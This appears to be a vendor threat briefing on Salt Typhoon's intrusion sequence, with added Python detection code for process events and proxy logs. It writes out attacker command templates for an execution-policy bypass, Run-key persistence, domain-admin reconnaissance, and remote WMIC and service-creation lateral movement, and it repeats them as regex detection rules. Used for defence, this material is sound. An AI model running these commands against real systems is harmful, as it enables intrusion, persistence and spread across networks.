
Vectra AI Threat Briefing: Salt Typhoon


TL;DW: How Does Salt Typhoon Operate?

Salt Typhoon follows a structured attack sequence using built-in Windows tools to avoid detection. Here’s a breakdown of their tactics and the commands they use.

1. Initial Access

Salt Typhoon primarily exploits public-facing servers with known vulnerabilities. Instead of relying on phishing, they prefer N-day and zero-day exploits to gain remote code execution (RCE).

2. Execution & Persistence

Once they gain access, they execute malicious payloads and ensure persistence using Windows tools.

PowerShell Execution:

They use PowerShell to run scripts regardless of the configured execution policy:

powershell -ex bypass -c "<password>"
  • -ex bypass: Short for -ExecutionPolicy Bypass; overrides the execution policy so the script is allowed to run.
  • <password>: Key used to decrypt the script, which is usually delivered in encrypted form.

Registry Persistence:

To ensure malware runs every time a user logs in, they add a registry key:

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "<malware_name>" /t REG_SZ /d "<malware_path>" /f
  • "HKCU\Software\Microsoft\Windows\CurrentVersion\Run": Registry location for programs that start automatically at user logon.
  • REG_SZ: Specifies a string value (here, the malware path).
  • /f: Forces the write without prompting for confirmation, overwriting any existing value of the same name.

3. Reconnaissance

Salt Typhoon gathers intelligence about the environment before escalating privileges.

Using WMIC (Windows Management Instrumentation Command-line)

wmic process get name,processid,commandline
  • Lists every running process with its PID and full command-line arguments.

Using net group to Identify Domain Admins

cmd /c "net group 'domain admins' /domain"
  • Queries Active Directory for domain admin accounts.
  • /domain: Ensures the query applies to the Active Directory domain instead of just the local machine.

4. Credential Theft & Privilege Escalation

After reconnaissance, they escalate privileges and steal credentials.

Deploying Credential Theft Tools

They install tools like:

  • Mimikatz (extracts credentials from memory).
  • Keyloggers (record keystrokes).
  • Credential-dumping utilities.

Privilege Escalation via Cobalt Strike

They deploy Cobalt Strike, a legitimate red teaming tool, to gain SYSTEM privileges and move deeper into the network.

5. Lateral Movement

Salt Typhoon spreads across the network using various Windows utilities.

Copying a Batch File to Another Machine

copy \\<target_ip>\C$\Windows\Temp\malware.bat
  • \\<target_ip>\C$: The administrative share of the C: drive on the remote machine, reachable with admin credentials over SMB.
  • Places a batch script (.bat) in the remote Temp folder so it can be executed in the next step.

Executing the Copied Script via WMIC

wmic /node:<target_ip> process call create "cmd /c C:\Windows\Temp\malware.bat"
  • /node:<target_ip>: Specifies the target machine.
  • process call create: Runs a process remotely.
  • cmd /c: Executes the copied batch file.

Creating a Backdoor Using Windows Services (sc create)

sc \\<target_ip> create VGAuthtools binpath= "C:\Windows\System32\installutil.exe C:\Windows\Temp\malware.exe" start= auto type= own
  • sc: Windows service control utility.
  • \\<target_ip>: Creates the service remotely on another machine.
  • VGAuthtools: Service name chosen to make the malware look like a legitimate tool.
  • binpath: Uses installutil.exe (a legitimate Windows tool) to execute the malicious payload.
  • start= auto: Ensures persistence by restarting the malware every time the machine reboots.
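Every command in sections 2, 3 and 5 is ordinary Windows administration on its own, so a defender's detection has to match the specific arguments (the execution-policy bypass, the Run key, the /node: and \\<target_ip> remote forms) and then correlate across stages on one host; section 1's entry point shows up as a shell spawned by a web-server process. The following Python is an added example, not Vectra's code and not taken from the briefing: it runs a small rule set over constructed process-creation records (the fields a parsed Sysmon Event ID 1 or Security event 4688 provides) and escalates a host once several distinct stages of the sequence appear on it. The host names, users, the 10.0.0.25 address, paths and rule names are all constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample of process-creation records, shaped like parsed Sysmon Event ID 1
# or Security event 4688 data. Hosts, users, the 10.0.0.25 address and paths are
# illustrative, not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "CORP\\jdoe", "parent": "w3wp.exe",
     "cmdline": 'powershell -ex bypass -c "Pa55w0rd"'},
    {"host": "ws01", "user": "CORP\\jdoe", "parent": "cmd.exe",
     "cmdline": 'reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" '
                '/v "updater" /t REG_SZ /d "C:\\Users\\Public\\u.exe" /f'},
    {"host": "ws01", "user": "CORP\\jdoe", "parent": "cmd.exe",
     "cmdline": "wmic process get name,processid,commandline"},
    {"host": "ws01", "user": "CORP\\jdoe", "parent": "cmd.exe",
     "cmdline": "cmd /c \"net group 'domain admins' /domain\""},
    {"host": "ws01", "user": "CORP\\svc_backup", "parent": "cmd.exe",
     "cmdline": 'wmic /node:10.0.0.25 process call create "cmd /c C:\\Windows\\Temp\\malware.bat"'},
    {"host": "ws01", "user": "CORP\\svc_backup", "parent": "cmd.exe",
     "cmdline": 'sc \\\\10.0.0.25 create VGAuthtools binpath= '
                '"C:\\Windows\\System32\\installutil.exe C:\\Windows\\Temp\\malware.exe" '
                'start= auto type= own'},
    # Benign admin activity that must not fire: a scheduled script with no policy bypass.
    {"host": "ws02", "user": "CORP\\admin", "parent": "explorer.exe",
     "cmdline": "powershell -NoProfile -File C:\\Scripts\\backup.ps1"},
]

# One rule per command shown in the briefing, tagged with the stage it belongs to.
# Patterns are case-insensitive and tolerate the usual aliases (-ex/-ep/-ExecutionPolicy,
# reg vs reg.exe, and so on).
RULES = [
    ("powershell_execpolicy_bypass", "execution",
     r"powershell(?:\.exe)?\b.*\s-e(?:x\w*|p)\s+bypass\b"),
    ("run_key_persistence", "persistence",
     r"\breg(?:\.exe)?\s+add\b.*\\CurrentVersion\\Run\b"),
    ("wmic_process_enumeration", "reconnaissance",
     r"\bwmic(?:\.exe)?\s+process\s+get\b"),
    ("domain_admins_enumeration", "reconnaissance",
     r"\bnet(?:\.exe)?\s+group\b.*domain admins"),
    ("remote_wmic_process_create", "lateral_movement",
     r"\bwmic(?:\.exe)?\s+/node:\S+.*\bprocess\s+call\s+create\b"),
    ("remote_service_create", "lateral_movement",
     r"\bsc(?:\.exe)?\s+\\\\\S+\s+create\b"),
]
COMPILED = [(name, stage, re.compile(pat, re.IGNORECASE)) for name, stage, pat in RULES]

# Web-server processes normally never spawn a shell; when one does, it points at the
# "public-facing server exploited for RCE" entry point rather than at a specific command.
WEB_SERVER_PARENTS = {"w3wp.exe", "httpd.exe", "nginx.exe", "tomcat.exe"}
SHELLS = ("powershell", "cmd.exe", "cmd ")


def scan_events(events):
    """Return one hit per (event, rule) match, plus web-server-spawned-shell hits."""
    hits = []
    for ev in events:
        cmd = ev["cmdline"]
        for name, stage, rx in COMPILED:
            if rx.search(cmd):
                hits.append({"host": ev["host"], "user": ev["user"], "rule": name,
                             "stage": stage, "cmdline": cmd})
        if ev["parent"].lower() in WEB_SERVER_PARENTS and cmd.lower().startswith(SHELLS):
            hits.append({"host": ev["host"], "user": ev["user"],
                         "rule": "web_server_spawned_shell", "stage": "initial_access",
                         "cmdline": cmd})
    return hits


def correlate_by_host(hits, min_stages=3):
    """Escalate hosts that show several distinct stages of the sequence.

    A lone 'net group' query is noise on an admin workstation; execution, persistence,
    recon and lateral movement from the same host is the pattern the briefing describes.
    """
    stages = defaultdict(set)
    for h in hits:
        stages[h["host"]].add(h["stage"])
    return {host: sorted(s) for host, s in stages.items() if len(s) >= min_stages}


if __name__ == "__main__":
    found = scan_events(SAMPLE_EVENTS)
    for h in found:
        print(f"[{h['stage']:>16}] {h['host']} {h['user']}: {h['rule']}  <- {h['cmdline'][:60]}")
    print("escalated hosts:", correlate_by_host(found))
```

The regexes are intentionally narrow: they key on argument combinations that administrators rarely type by hand (a remote `/node:` with `process call create`, an `sc \\host create`) rather than on the binaries, which are present on every Windows machine. The per-host stage count is what turns seven individually explainable events into one alert.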

6. Command & Control (C2) + Data Exfiltration

Salt Typhoon establishes persistent communication with their C2 servers.

Cobalt Strike & Demodex Malware

  • Sends periodic "heartbeats" to the C2 server to signal that the machine is still compromised and reachable.
  • Receives new instructions and updates.
  • Exfiltrates stolen credentials and sensitive data.

Abusing Public Cloud Services for Exfiltration

Salt Typhoon avoids detection by using trusted platforms to upload stolen data:

  • AnonFiles
  • File.io
  • GitHub
  • Gmail
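The two halves of section 6 leave different traces in egress telemetry: the heartbeat in "Cobalt Strike & Demodex Malware" is a timer-driven connection with near-constant intervals, and the cloud-service exfiltration is unusual outbound volume toward services that are otherwise ordinary traffic. The Python below is an added example, not Vectra's code and not from the briefing: it parses a constructed proxy log, flags source/destination pairs whose inter-arrival times are too regular to be a person, and sums POST/PUT bytes to the services the briefing names. The log lines, the 10.0.0.x addresses, the reserved `.invalid` C2 name, the thresholds and the domain list for those services are all constructed for the example.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy log, one request per line: ts,src,dst_host,method,bytes_out.
# Hosts, the reserved .invalid C2 name and the byte counts are made up for this example.
SAMPLE_LOG = """\
2025-01-10T10:00:00Z,10.0.0.25,cdn-update.invalid,GET,312
2025-01-10T10:01:01Z,10.0.0.25,cdn-update.invalid,GET,312
2025-01-10T10:01:59Z,10.0.0.25,cdn-update.invalid,GET,312
2025-01-10T10:03:00Z,10.0.0.25,cdn-update.invalid,GET,312
2025-01-10T10:04:02Z,10.0.0.25,cdn-update.invalid,GET,312
2025-01-10T10:04:58Z,10.0.0.25,cdn-update.invalid,GET,312
2025-01-10T10:02:10Z,10.0.0.25,file.io,POST,26214400
2025-01-10T10:02:40Z,10.0.0.25,file.io,POST,26214400
2025-01-10T10:03:15Z,10.0.0.25,file.io,POST,26214400
2025-01-10T09:12:00Z,10.0.0.7,github.com,GET,480
2025-01-10T09:40:30Z,10.0.0.7,github.com,POST,2048
2025-01-10T11:05:00Z,10.0.0.7,github.com,GET,480
"""

# Services the briefing names as exfiltration channels (domain forms assumed here).
# Presence alone is not a signal, since GitHub and Gmail are everyday traffic; volume is.
EXFIL_DOMAINS = {"anonfiles.com", "file.io", "github.com", "mail.google.com", "gmail.com"}


def parse_log(text):
    """Turn the CSV-style lines into records with a real datetime and an int byte count."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, method, bytes_out = line.split(",")
        records.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                        "src": src, "dst": dst, "method": method,
                        "bytes_out": int(bytes_out)})
    return records


def find_beacons(records, min_connections=5, max_cv=0.2):
    """Flag src->dst pairs whose connection intervals are suspiciously regular.

    A heartbeat fires on a fixed timer plus a little jitter, so the coefficient of
    variation (stdev / mean) of the inter-arrival times stays small; browsing does not.
    """
    by_pair = defaultdict(list)
    for r in records:
        by_pair[(r["src"], r["dst"])].append(r["ts"])
    beacons = []
    for (src, dst), times in by_pair.items():
        if len(times) < min_connections:
            continue
        times.sort()
        deltas = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(deltas)
        if mean <= 0:  # a burst at one instant is not a beacon
            continue
        cv = statistics.pstdev(deltas) / mean
        if cv <= max_cv:
            beacons.append({"src": src, "dst": dst, "count": len(times),
                            "mean_interval_s": mean, "cv": cv})
    return beacons


def _is_exfil_domain(host):
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in EXFIL_DOMAINS)


def find_bulk_uploads(records, threshold_bytes=10 * 1024 * 1024):
    """Sum outbound bytes of POST/PUT requests per (src, exfil domain); report pairs over the threshold."""
    totals = defaultdict(int)
    for r in records:
        if r["method"] in ("POST", "PUT") and _is_exfil_domain(r["dst"]):
            totals[(r["src"], r["dst"])] += r["bytes_out"]
    return [{"src": s, "dst": d, "bytes_out": b}
            for (s, d), b in totals.items() if b >= threshold_bytes]


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for b in find_beacons(recs):
        print(f"beacon: {b['src']} -> {b['dst']} every ~{b['mean_interval_s']:.0f}s (cv={b['cv']:.3f})")
    for u in find_bulk_uploads(recs):
        print(f"bulk upload: {u['src']} -> {u['dst']} {u['bytes_out'] / 2**20:.1f} MiB")
```

On the sample, 10.0.0.25 is reported twice: once for a roughly 60-second heartbeat to the C2 host and once for 75 MiB of POSTs to file.io, while 10.0.0.7's small GitHub traffic stays below both thresholds. In production the thresholds should be tuned per environment, and the volume check is most useful when baselined against each host's normal upload behaviour rather than a fixed byte count.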

7. Ongoing Espionage & Impact

Salt Typhoon continuously monitors compromised networks and steals sensitive data over an extended period.


How Can Vectra AI Detect These Attacks?

Vectra AI’s platform focuses on real attack behaviors, not just known threats. This allows it to detect Salt Typhoon-like activity even when attackers use built-in Windows tools.

  • Unusual remote access & execution
  • Suspicious Kerberos activity
  • Privilege anomalies & SMB brute-force attempts
  • Hidden tunnels & suspicious PowerShell activity
